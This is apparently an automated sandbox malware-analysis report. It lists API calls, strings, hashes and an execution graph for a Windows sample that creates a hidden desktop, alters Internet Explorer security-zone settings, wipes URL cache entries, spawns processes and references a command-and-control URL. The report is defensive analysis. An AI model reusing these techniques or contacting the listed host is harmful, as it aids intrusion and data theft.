                            • Instruction Fuzzy Hash: BCF03A21B642206B93126B327D4293E36689792B19395003FF840F6191DB7C09225F9F
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            APIs
                            • printf.CRTDLL([length=%i] [summ=%i],?,00000000), ref: 004037DD
                            • printf.CRTDLL(HEX: ,[length=%i] [summ=%i],?,00000000), ref: 004037EE
                            • printf.CRTDLL(%02X ,00000000), ref: 00403804
                            • printf.CRTDLL(TXT: '%s',?), ref: 0040382C
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: TXT: '%s'$%02X $HEX: $X4$[length=%i] [summ=%i]
                            • API String ID: 3524737521-4004101572
                            • Opcode ID: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction ID: a8ef6db4a05ad48ab0456940bf437e850f92713de92630681f76b68ebadef0f7
                            • Opcode Fuzzy Hash: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction Fuzzy Hash: 88016B62A04254BED7006FA7CC82A6F7FDCAB4175AF2080BEF545730C0D1B86F41D6A6
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 004054F1
                            • lstrlenA.KERNEL32(?,?), ref: 00405505
                            • lstrlenA.KERNEL32(?,?,?), ref: 00405513
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                            • LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                            • memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006), ref: 004055FE
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCloseCodeCreateExitHandleLocalObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2845097592-0
                            • Opcode ID: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction ID: 017c82820a2f145177c9e28e2e3f5c0bebc6ad2cdfe5315ab2aa4ad5daf85086
                            • Opcode Fuzzy Hash: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction Fuzzy Hash: 5E31D721A04159BACF01DFA6CC01AAEB7F9AF44318F144476F904E7291E63CDB15C7A9
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            APIs
                            • GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
                            • SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
                            • SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
                            • CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
                            Strings
                            Similarity
                            • API ID: InfoSecurity$CloseEntriesHandle
                            • String ID: @$CURRENT_USER$\device\physicalmemory
                            • API String ID: 405656561-3357994103
                            APIs
                            • sprintf.CRTDLL(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u,00000000), ref: 004050CD
                            Strings
                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004050FF
                            • .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess, xrefs: 00405118
                            • yes, xrefs: 0040510E
                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 004050C1
                            • 1601, xrefs: 004050D4
                            • BrowseNewProcess, xrefs: 00405113
                            • GlobalUserOffline, xrefs: 004050FA
                            Similarity
                            • API ID: sprintf
                            • String ID: .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess$1601$BrowseNewProcess$GlobalUserOffline$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u$Software\Microsoft\Windows\CurrentVersion\Internet Settings$yes
                            • API String ID: 590974362-546450379
                            APIs
                            Similarity
                            • API ID: Focus$CallProcWindow
                            • String ID:
                            • API String ID: 2401821148-0
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036D7
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036F4
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403715
                            • WriteFile.KERNEL32(00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000), ref: 00403728
                            • CloseHandle.KERNEL32(00000000,00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?), ref: 00403734
                            Strings
                            Similarity
                            • API ID: File$Write$CloseCreateHandlePointer
                            • String ID: Y&-v
                            • API String ID: 2529654636-852306816
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Strings
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00404341
                            • GetThreadDesktop.USER32(00000000), ref: 00404347
                            • CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
                            • SetThreadDesktop.USER32 ref: 00404394
                            Strings
                            Similarity
                            • API ID: DesktopThread$CreateCurrent
                            • String ID: blind_user
                            • API String ID: 2384851093-487808672
                            APIs
                            Strings
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            APIs
                            • memset.CRTDLL(?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403C8B
                            • memcpy.CRTDLL(?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CAE
                            • memcpy.CRTDLL(-0042AA50,?,00000006,?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CBE
                            Strings
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: MC
                            • API String ID: 438689982-3957011357
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004017CC
                            • CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                            • CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            Strings
                            • {9BA05972-F6A8-11CF-A442-00A0C90A8F39}, xrefs: 004017D5
                            Similarity
                            • API ID: CreateFromInitializeInstanceString
                            • String ID: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
                            • API String ID: 1245325315-1222218007
                            APIs
                            Similarity
                            • API ID: signal$raise
                            • String ID:
                            • API String ID: 372037113-0
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            APIs
                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
                            • RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
                            • RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            APIs
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042FB
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            • Opcode ID: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction ID: cf1cf3c615f6ac6775c7614bbea78a1f327309af87cada33f382846b8ae172d8
                            • Opcode Fuzzy Hash: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction Fuzzy Hash: 1BF0E972B442143AE62029758C03FDE355D8B41B78F144131FB10FB1D1D5B8BA0142AD
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            • Opcode ID: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction ID: b939d44f97a8665b9279395720dceab0b5e56fea97a4cdd5017e5321b1dcff8d
                            • Opcode Fuzzy Hash: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction Fuzzy Hash: 0B511D71A00215EFDB20CFA8D884BAAB7F4BB18315F5041B6E904E72A0D7749995CF59
                            APIs
                              • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                              • Part of subcall function 00406753: GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                              • Part of subcall function 00406753: CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                            • _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize_sleep
                            • String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
                            • API String ID: 4235044784-1201080362
                            • Opcode ID: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction ID: fffe33e14b07b0123592d698d33e8a34a507cc30d1f0c5c96ad3af2b43ec03e4
                            • Opcode Fuzzy Hash: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction Fuzzy Hash: ADD05E72B453043B9200757E9D07929F5CE4AA0AA83B9446BBA01F73F1E8F89E1151AB

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:542
                            Total number of Limit Nodes:2
                            execution_graph 2711 403840 printf 2712 403880 2711->2712 2713 403884 printf 2712->2713 2714 40386d printf 2712->2714 2714->2712 2720 4052e0 2721 4052ec strcat strcat 2720->2721 2737 40431f 2721->2737 2724 405360 2725 40537c CreateProcessA 2724->2725 2726 405469 2725->2726 2727 4053ac CloseHandle sprintf 2725->2727 2728 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 2726->2728 2729 405413 2727->2729 2730 4054d0 2728->2730 2731 4053e5 FindWindowA 2729->2731 2732 40541d 2729->2732 2731->2732 2733 405402 Sleep 2731->2733 2732->2726 2734 405421 Sleep 2732->2734 2733->2729 2735 405434 Sleep 2734->2735 2736 40543e GetWindowTextA 2734->2736 2735->2736 2736->2726 2738 404341 GetCurrentThreadId GetThreadDesktop 2737->2738 2739 404364 CreateDesktopA 2737->2739 2740 40438e SetThreadDesktop 2738->2740 2741 40435f memset 2738->2741 2739->2740 2739->2741 2740->2741 2741->2724 2741->2725 2844 401581 2845 4015c8 2844->2845 2846 4015a2 rand 2845->2846 2847 4015cc 2845->2847 2846->2845 2742 403562 GetModuleFileNameA 2743 403588 2742->2743 3004 402ba3 3007 402a89 3004->3007 3005 402cd2 3006 402cad GetCurrentProcessId 3006->3007 3007->3005 3007->3006 3008 402b2a GetModuleHandleA GetProcAddress 3007->3008 3008->3007 2744 4077e4 2745 407808 2744->2745 2752 40789e 2744->2752 2746 407820 SetFocus 2745->2746 2747 40782b 2745->2747 2745->2752 2746->2747 2748 407833 SetFocus 2747->2748 2749 40783e 2747->2749 2748->2749 2750 407857 2749->2750 2751 40784c SetFocus 2749->2751 2753 40786a 2750->2753 2754 40785f SetFocus 2750->2754 2751->2750 2757 407910 2752->2757 2758 4078fe CallWindowProcA 2752->2758 2755 407872 SetFocus 2753->2755 2756 40787d 2753->2756 2754->2753 2755->2756 2756->2752 2759 407885 SetFocus 2756->2759 2758->2757 2759->2752 2848 405c09 lstrlenA GetTickCount srand 2881 40509b 2848->2881 2853 405f54 2854 405caf ExpandEnvironmentStringsA 2895 40570c 2854->2895 2857 405ceb strcat strcat 2858 40431f 4 API calls 2857->2858 2859 405d14 memset 
2858->2859 2860 405d72 CreateProcessA 2859->2860 2861 405d56 2859->2861 2862 405da2 CloseHandle sprintf 2860->2862 2863 405f24 DeleteFileA TerminateProcess CloseHandle 2860->2863 2861->2860 2864 405e09 2862->2864 2863->2853 2865 405e13 2864->2865 2866 405ddb FindWindowA 2864->2866 2865->2863 2868 405e1b Sleep GetWindowTextA 2865->2868 2866->2865 2867 405df8 Sleep 2866->2867 2867->2864 2869 405e50 2868->2869 2869->2863 2934 405613 2869->2934 2871 405e6b 2871->2863 2872 405e76 CopyFileA 2871->2872 2873 403619 5 API calls 2872->2873 2874 405e9c DeleteFileA lstrlenA strncmp 2873->2874 2875 405ec6 lstrlenA 2874->2875 2876 405eef 2874->2876 2942 403743 CreateFileA 2875->2942 2878 403743 4 API calls 2876->2878 2879 405eea LocalFree 2878->2879 2879->2863 2882 4050ea 2881->2882 2883 4050b6 sprintf 2882->2883 2884 4050f8 2882->2884 2945 4041f4 2883->2945 2885 4041f4 4 API calls 2884->2885 2887 40510e 2885->2887 2948 4041c3 lstrlenA 2887->2948 2890 40429c RegOpenKeyExA 2891 4042e0 RegQueryValueExA 2890->2891 2892 4042dc 2890->2892 2893 404304 RegCloseKey 2891->2893 2894 4042f8 RegCloseKey 2891->2894 2892->2853 2892->2854 2893->2892 2894->2892 2896 4079e4 2895->2896 2897 405719 GetTempPathA 2896->2897 2898 405746 2897->2898 2898->2898 2956 4015ea 2898->2956 2901 405798 strcat 2902 4057ac rand 2901->2902 2903 4057e7 rand 2902->2903 2904 4057be rand sprintf 2902->2904 2905 4057f9 strcat 2903->2905 2906 40580d strcat rand 2903->2906 2904->2903 2905->2906 2907 405839 strcat 2906->2907 2908 40584d rand 2906->2908 2907->2908 2909 405888 sprintf rand 2908->2909 2910 40585f rand sprintf 2908->2910 2911 4058c3 strcat 2909->2911 2912 4058d7 strcat rand 2909->2912 2910->2909 2911->2912 2913 405911 strcat rand 2912->2913 2914 4058fd strcat 2912->2914 2915 405966 strcat rand 2913->2915 2916 40593d rand sprintf 2913->2916 2914->2913 2917 4059a0 strcat rand 2915->2917 2918 40598c strcat 2915->2918 2916->2915 2919 4059d2 strcat 2917->2919 2920 4059e6 strcat rand 2917->2920 2918->2917 
2919->2920 2921 405a20 sprintf rand 2920->2921 2922 405a0c strcat 2920->2922 2923 405a70 strcat rand 2921->2923 2924 405a5c strcat 2921->2924 2922->2921 2925 405ab0 rand sprintf rand 2923->2925 2926 405a9c strcat 2923->2926 2924->2923 2927 405af3 strcat 2925->2927 2928 405b07 strcat rand 2925->2928 2926->2925 2927->2928 2929 405b39 strcat 2928->2929 2930 405b4d rand 2928->2930 2929->2930 2931 405b88 strcat CreateFileA lstrlenA WriteFile CloseHandle 2930->2931 2932 405b5f rand sprintf 2930->2932 2933 405c04 2931->2933 2932->2931 2933->2853 2933->2857 2935 4079e4 2934->2935 2936 405620 FindFirstUrlCacheEntryA 2935->2936 2937 405663 _stricmp 2936->2937 2940 405685 2936->2940 2938 4056a7 FindNextUrlCacheEntryA 2937->2938 2937->2940 2939 4056c9 _stricmp 2938->2939 2938->2940 2939->2940 2941 4056fb 2939->2941 2940->2871 2941->2938 2943 403775 2942->2943 2944 403779 SetFilePointer WriteFile CloseHandle 2942->2944 2943->2879 2944->2943 2951 40421f RegCreateKeyExA 2945->2951 2949 40421f 4 API calls 2948->2949 2950 4041ee InterlockedIncrement memset 2949->2950 2950->2890 2952 404262 RegSetValueExA 2951->2952 2953 404219 2951->2953 2954 404288 RegCloseKey 2952->2954 2955 40427c RegCloseKey 2952->2955 2953->2882 2954->2953 2955->2953 2957 401634 2956->2957 2958 401638 strcat sprintf rand 2957->2958 2959 40160e rand 2957->2959 2958->2901 2958->2902 2959->2957 3009 4037aa 3010 4037c8 printf printf 3009->3010 3012 40380d 3010->3012 3013 4037fa printf 3012->3013 3015 403812 printf 3012->3015 3013->3012 3016 4035ab 3017 4079e4 3016->3017 3018 4035b8 vsprintf 3017->3018 3021 4035f9 MessageBoxA 3018->3021 3020 4035ea 3021->3020 2760 40686c lstrlenA 2761 405f5b 9 API calls 2760->2761 2762 40689a 2761->2762 2763 4068a1 WinExec 2762->2763 2764 4068a9 2762->2764 2763->2764 2960 40328f 2970 402efd 2960->2970 2961 402cd7 3 API calls 2961->2970 2962 4033ce 2963 40289a 4 API calls 2963->2970 2964 4030e5 GetModuleHandleA 2964->2970 2965 40314c VirtualQuery 2966 4031b1 IsBadWritePtr 2965->2966 
2965->2970 2966->2970 2967 402f98 GlobalMemoryStatus 2967->2970 2968 402f6f IsBadReadPtr 2968->2970 2969 403059 CloseHandle 2969->2970 2970->2961 2970->2962 2970->2963 2970->2964 2970->2965 2970->2967 2970->2968 2970->2969 2971 407892 2972 40789e 2971->2972 2973 407910 2972->2973 2974 4078fe CallWindowProcA 2972->2974 2974->2973 3022 405133 10 API calls 3023 40429c 4 API calls 3022->3023 3024 405264 3023->3024 3025 405278 3024->3025 3026 40526b LocalFree 3024->3026 3028 40509b 6 API calls 3025->3028 3027 4054d0 3026->3027 3029 40527d ExpandEnvironmentStringsA 3028->3029 3048 404532 3029->3048 3032 4052d3 LocalFree 3032->3027 3033 4052ec strcat strcat 3034 40431f 4 API calls 3033->3034 3035 405315 memset 3034->3035 3036 405360 3035->3036 3037 40537c CreateProcessA 3035->3037 3036->3037 3038 4053ac CloseHandle sprintf 3037->3038 3047 405469 3037->3047 3040 405413 3038->3040 3039 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 3039->3027 3041 4053e5 FindWindowA 3040->3041 3042 40541d 3040->3042 3041->3042 3043 405402 Sleep 3041->3043 3044 405421 Sleep 3042->3044 3042->3047 3043->3040 3045 405434 Sleep 3044->3045 3046 40543e GetWindowTextA 3044->3046 3045->3046 3046->3047 3047->3039 3049 40453f 3048->3049 3050 403619 5 API calls 3049->3050 3051 404570 3050->3051 3052 404579 3051->3052 3053 404596 lstrlenA LocalAlloc GetTempPathA 3051->3053 3054 404589 LocalFree 3051->3054 3052->3032 3052->3033 3055 404604 3053->3055 3054->3052 3055->3055 3056 4015ea rand 3055->3056 3057 40461d strcat sprintf rand 3056->3057 3058 404655 strcat 3057->3058 3059 404668 rand 3057->3059 3058->3059 3060 40467a rand sprintf 3059->3060 3061 40469d rand 3059->3061 3060->3061 3062 4046bb strcat 3061->3062 3063 4046ce strcat rand 3061->3063 3062->3063 3064 4046f3 strcat 3063->3064 3065 404706 rand 3063->3065 3064->3065 3066 404741 sprintf rand 3065->3066 3067 40471e rand sprintf 3065->3067 3068 404770 strcat 3066->3068 3069 404783 strcat rand 3066->3069 3067->3066 3068->3069 3070 4047a8 
